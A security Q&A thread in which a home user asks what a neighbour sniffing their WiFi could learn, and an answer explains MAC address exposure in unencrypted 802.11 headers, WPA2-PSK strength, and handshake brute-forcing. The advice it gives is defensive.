2

I'm a noob in home security and networking. I suspect one of my neighbor is sniffing packets destined to my wifi router. I have many questions about this

  1. Will they be able to identify the no. of devices I have connected to the router?
  2. If yes, is there a way for me to hide the device details from packet sniffers?
  3. Will they be able to break my WiFi password if they are aware of web pages I visit regularly. Like a specific youtube channel etc?
multithr3at3d
  • 12,355
  • 3
  • 29
  • 42
skab
  • 23
  • 2

1 Answers1

2

When using WiFi i.e. 802.11 as the link layer, the frame headers aren't encrypted, revealing three MAC addresses (actually four, but the fourth is only used in ad-hoc mode). If you are more interested in the theory and how it looks like, you could read my more detailed answer to question "What does WPA2 traffic look like to a packet sniffer that is not connected to the network?"

This answers your first two questions:

  1. From the MAC addresses it is possible to know the number of devices and mostly their manufacturers, too, as the first three octets are the organizationally unique identifier (OUI). The number of different MAC addresses will reveal the number of devices connected to the access point.

  2. It is impossible to hide this information. While it is easy to spoof MAC address with computers, that does not work for all IoT devices. Also, spoofing and even changing the MAC address from time to time does not really hide the number of devices connected at a certain time. It can merely hide the vendor.

The last question depends on the encryption you are using. I assume you have properly protected your network with WPA2, and as a home user it is probably WPA2-PSK (pre-shared key), hopefully with AES (see e.g. Chris Hoffman: Wi-Fi Security: Should You Use WPA2-AES, WPA2-TKIP, or Both? for more details on why this matters).

  1. With WPA2-PSK, it is not possible to deduce the pre-shared key from the encrypted data. It does not matter whether someone sniffing your network does know the sites or not, as this information is within the encrypted payload.

However, it works the other way around. If an attacker can get your pre-shared key i.e. your "WiFi password", it will be possible to encrypt everything that has been captured from the network, given the capture contains the 4-way handshake. It is easy to deauthenticate a device, forcing a new 4-way handshake, so it is wise to always assume the attacker has it. It is also possible to try and brute-force the PSK against the captured traffic. For these reasons, you should use a long, random PSK and not keep it in a visible place.

Esa Jokinen
  • 16,100
  • 5
  • 50
  • 55
  • Don't forget about WPA3! – multithr3at3d Oct 31 '20 at 14:07
  • 2
    @multithr3at3d: Can't put everything in one answer. While WPA3 solves many security problems including deauthentication attacks, the frame headers are still unencrypted, and they have to be. WPA3 has been mandatory for new Wi-Fi certifications since July 2020, but it will take the some time before it's widespread in home networks. I think it's still, as of Oct 2020, best to assume a typical home has WPA2. – Esa Jokinen Oct 31 '20 at 14:28